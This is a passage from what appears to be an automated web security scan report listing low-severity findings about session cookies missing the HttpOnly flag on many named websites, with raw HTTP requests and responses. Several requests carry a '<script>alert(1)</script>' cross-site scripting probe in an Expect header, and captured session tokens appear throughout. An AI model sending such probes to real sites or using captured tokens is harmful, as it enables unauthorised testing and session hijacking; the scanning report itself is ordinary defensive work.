JSESSIONID=4E8CE0D58DDA8054F508AA51D777A9A7; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pages02.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:48:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=4E8CE0D58DDA8054F508AA51D777A9A7; Path=/
Content-Length: 952
Connection: close
Content-Type: text/html;charset=utf-8

<html><head><title>Apache Tomcat/6.0.29 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.39. http://www.pages05.net/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pages05.net
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4F0E35F760DDB08302D95CAAB316BDCD; Path=/
BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pages05.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:52:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=4F0E35F760DDB08302D95CAAB316BDCD; Path=/
Content-Length: 952
Connection: close
Content-Type: text/html;charset=utf-8
Set-Cookie: BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

<html><head><title>Apache Tomcat/6.0.29 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.40. http://www.positivepromotions.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.positivepromotions.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQASSBARB=ENMLDJNDOEOKHLMCKPOEHBJC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.positivepromotions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Tue, 03 May 2011 11:21:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /pagenotfound.aspx?404;http://dminsite.com:80/favicon.ico
Content-Length: 178
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASSBARB=ENMLDJNDOEOKHLMCKPOEHBJC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/pagenotfound.aspx?404;http://dminsite.com:80/favicon.ico">here</a>.</body>

13.41. http://www.ricedelman.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ricedelman.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=aUKOOEVRxacdjFaI1_; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ricedelman.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.42. http://www.ryans.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ryans.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=qgkdtio0lnun8kq6lqualpkm86; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ryans.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 10:33:14 GMT
Server: Apache/2.0.63 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qgkdtio0lnun8kq6lqualpkm86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /
Content-Length: 0
Content-Type: text/html

13.43. http://www.sanfranrecruiter.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sanfranrecruiter.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e936f5c72d5d23dec3d2dfe1cf7f0da6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sanfranrecruiter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.44. http://www.sdstate.edu/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sdstate.edu
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=383015b26e0ae4392098339c5b831f77565e;path=/
JSESSIONID=383015b26e0ae4392098339c5b831f77565e;expires=Fri, 13-May-2011 10:14:14 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sdstate.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:14:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=383015b26e0ae4392098339c5b831f77565e;path=/
Set-Cookie: JSESSIONID=383015b26e0ae4392098339c5b831f77565e;expires=Fri, 13-May-2011 10:14:14 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...

13.45. http://www.setonhill.edu/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.setonhill.edu
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=977113;expires=Thu, 25-Apr-2041 10:40:45 GMT;path=/
CFTOKEN=51625507;expires=Thu, 25-Apr-2041 10:40:45 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.setonhill.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: https://griffinslair.setonhill.edu/css/shu.ico
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=977113;expires=Thu, 25-Apr-2041 10:40:45 GMT;path=/
Set-Cookie: CFTOKEN=51625507;expires=Thu, 25-Apr-2041 10:40:45 GMT;path=/
Date: Tue, 03 May 2011 10:40:45 GMT
Content-Length: 0

13.46. http://www.sharethatboy.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sharethatboy.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=vc244ha2bai7nhnhhp246ht6g7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharethatboy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=vc244ha2bai7nhnhhp246ht6g7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5609
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.47. http://www.shawdirect.ca/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.shawdirect.ca
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCBTBBTD=ONHEJOMAMJBNCNLDDLAKCLJA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shawdirect.ca
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:39:56 GMT
IISExport: This web site was exported using IIS Export v3.0
IISExport: This web site was exported using IIS Export v3.0
X-Powered-By: ASP.NET
Content-Length: 13190
Content-Type: text/html
Expires: Mon, 02 May 2011 01:19:56 GMT
Set-Cookie: ASPSESSIONIDCCBTBBTD=ONHEJOMAMJBNCNLDDLAKCLJA; path=/
Cache-control: private

<meta name=vs_snapToGrid content="False">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

13.48. http://www.specialops.org/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.specialops.org
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSession=Buffer=1304406113&Owner=C; path=/
ASPSESSIONIDCCABSDAQ=IONDIJPBBKCHCALJFCHEHKNL; path=/
apvc=saas307; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.specialops.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.49. http://www.superiorpowersports.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.superiorpowersports.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAAQSRSBB=OPLBCNODFGAGCGFEMMFFDNOF; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superiorpowersports.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:43:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAQSRSBB=OPLBCNODFGAGCGFEMMFFDNOF; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

13.50. http://www.swissarmy.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.swissarmy.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Commerce_TestSessionCookie=TestCookie; path=/
Commerce_TestPersistentCookie=TestCookie; expires=Wed, 04-May-2011 11:38:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swissarmy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:05 GMT
Server: Microsoft-IIS/6.0
servername: swiar-web02p
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Last-Modified: Wed, 06 Apr 2011 18:27:10 GMT
ETag: "{D76CE4C6-1E38-4402-856A-B2861F89CC93},62"
ResourceTag: rt:D76CE4C6-1E38-4402-856A-B2861F89CC93@00000000062
Content-Type: image/x-icon
Exires: Mon, 18 Apr 2011 11:38:05 GMT
Cache-Control: private,max-age=0
Content-Length: 3638
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: VSACS_GEO_LOCATION_COOKIE=US; path=/
Set-Cookie: Commerce_TestPersistentCookie=TestCookie; expires=Wed, 04-May-2011 11:38:05 GMT; path=/
Set-Cookie: Commerce_TestSessionCookie=TestCookie; path=/

..............h...&... ..............(....... ...........@...........................ZM...............y..1(..............!...ke..J8..........................{q..........).......B0..RE......cU..se..B<
...[SNIP]...

13.51. http://www.sylvania.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sylvania.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=x1cyxp45bntm5xymenok4z45; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sylvania.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:23:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=x1cyxp45bntm5xymenok4z45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>OSRAM SYLVANIA - Page Not Found</title>
       <meta content="False" name="vs_showGrid">
       <meta content="Fals
...[SNIP]...

13.52. http://www.tahoedailytribune.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tahoedailytribune.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PBCSSESSIONID=1073426013602030; path=/
PBCSPERMUSERID=1073426013602030; path=/; expires=Wed, 02 May 2012 03:46:42 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tahoedailytribune.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Cache-Control: max-age=0, s-maxage=0
Content-Length: 67046
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 03 May 2011 10:46:42 GMT
Last-Modified: Tue, 03 May 2011 10:46:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=1073426013602030; path=/; expires=Wed, 02 May 2012 03:46:42 GMT
Set-Cookie: PBCSSESSIONID=1073426013602030; path=/
X-Passed-To: S260608AT1VW625, URL Rewrite on site N/A (2011-05-03 06:46:42:015)
X-Handled-By: S260608AT1VW625, Rewrite on site N/A
X-Actual-URL: S260608AT1VW625, (/favicon.ico)
X-Passed-To-DLL: S260608AT1VW625, (2011-05-03 06:46:42:015)
X-Passed-To-BeforeDispatch: S260608AT1VW625, on site TD (2011-05-03 06:46:42:015)
X-Returned-From-BeforeDispatch: S260608AT1VW625, on site TD (2011-05-03 06:46:42:046)
X-Passed-To-PostProcessResponse: S260608AT1VW625, on site TD (2011-05-03 06:46:42:124)
X-Returned-From-PostProcessResponse: S260608AT1VW625, on site TD (2011-05-03 06:46:42:124)
X-Returned-From-DLL: S260608AT1VW625 (2011-05-03 06:46:42:124)
X-Returned-From: S260608AT1VW625(2011-05-03 06:46:42:124)
Date: Tue, 03 May 2011 10:46:42 GMT
X-Cache: MISS from swsquid01
X-Cache-Lookup: MISS from swsquid01:80
Via: 1.0 swsquid01 (squid/3.0.STABLE18)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head>
<TITLE></TITLE>
<META NAME="Description" CONTENT="
<META NAME="Keywords" CO
...[SNIP]...

13.53. http://www.targetcenter.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.targetcenter.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQADCDDST=PMDADNGDLGNKBAGCEGAMINHN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.targetcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Tue, 03 May 2011 11:05:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.targetcenter.com/default.asp?id=8
Content-Length: 165
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQADCDDST=PMDADNGDLGNKBAGCEGAMINHN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.targetcenter.com/default.asp?id=8">here</a>.</body>

13.54. http://www.teachingtextbooks.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.teachingtextbooks.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQTQQRST=HPPPINODHMJBNAEIAPOLGJGC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teachingtextbooks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:41:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQTQQRST=HPPPINODHMJBNAEIAPOLGJGC; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

13.55. http://www.tempcredit.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tempcredit.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=i5r6iu8pbh1ni0cl96728mlbp1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tempcredit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=i5r6iu8pbh1ni0cl96728mlbp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3516
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name
...[SNIP]...

13.56. http://www.thelaughtermovie.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thelaughtermovie.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSe8c893b16321029dc41c0b35727e8481=s6u0kegn135eal5qr7au8bg2h0; expires=Thu, 26-May-2011 14:11:03 GMT; path=/; domain=.thelaughtermovie.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thelaughtermovie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.57. http://www.tireteam.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tireteam.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=400de2bba6a2d859b9262db9a987ee67; path=/; domain=.tireteam.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tireteam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.58. http://www.tradearca.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tradearca.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQTTRBQD=MAIHKEODDJMMDMLJEJDADMEG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:32:40 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40743
Content-Type: text/html
Expires: Mon, 02 May 2011 11:31:40 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=MAIHKEODDJMMDMLJEJDADMEG; path=/
Cache-control: False

<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...

13.59. http://www.trafficstrategies.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trafficstrategies.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSCQDQCRB=CMGBGMODMEJEIKNNDPOALGNL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficstrategies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:48:30 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Location: http://www.linkshare.com/solutions/leadadvantage.shtml
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCQDQCRB=CMGBGMODMEJEIKNNDPOALGNL; path=/
Cache-control: private

13.60. http://www.travelagentcentral.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.travelagentcentral.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSb5663581135df8f6d7f3994b7ed7a15c=f5v89rf77i4c60ioq37m5e6s87; expires=Thu, 26-May-2011 13:52:34 GMT; path=/; domain=.travelagentcentral.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.61. http://www.udisglutenfree.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.udisglutenfree.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7718d60f07db2e9cf3cba985c5b8b966; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.udisglutenfree.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:30:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=7718d60f07db2e9cf3cba985c5b8b966; path=/
Location: http://udisglutenfree.com/favicon.ico
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.62. http://www.unitedfcu.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.unitedfcu.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7b21ff8eb3e77e307892ec7527b164ab; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.unitedfcu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:41 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=7b21ff8eb3e77e307892ec7527b164ab; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1406
Connection: close
Content-Type: image/x-icon

..............h.......(....... ...............................-...0...}.................................................................................................................................
...[SNIP]...

13.63. http://www.usairwayscruises.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usairwayscruises.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSQQTBQSA=MGIKPLNDFOODMPNILBFIJKHE; path=/
WDVID=%7B97000B01%2D7AE0%2D4995%2DBF8B%2D3577DB039EC5%7D; path=/
WDUID=%7BE08A6E4D%2D6412%2D46DB%2D8C05%2D6F7AAF226F96%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
NSC_WJQ-XXX.VTBJSXBZTDSVJTFT.DPN=ffffffff095b1c1a45525d5f4f58455e445a4a423662;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usairwayscruises.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Tue, 03 May 2011 10:14:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Location: /images_unique/blank.gif
Content-Length: 145
Content-Type: text/html
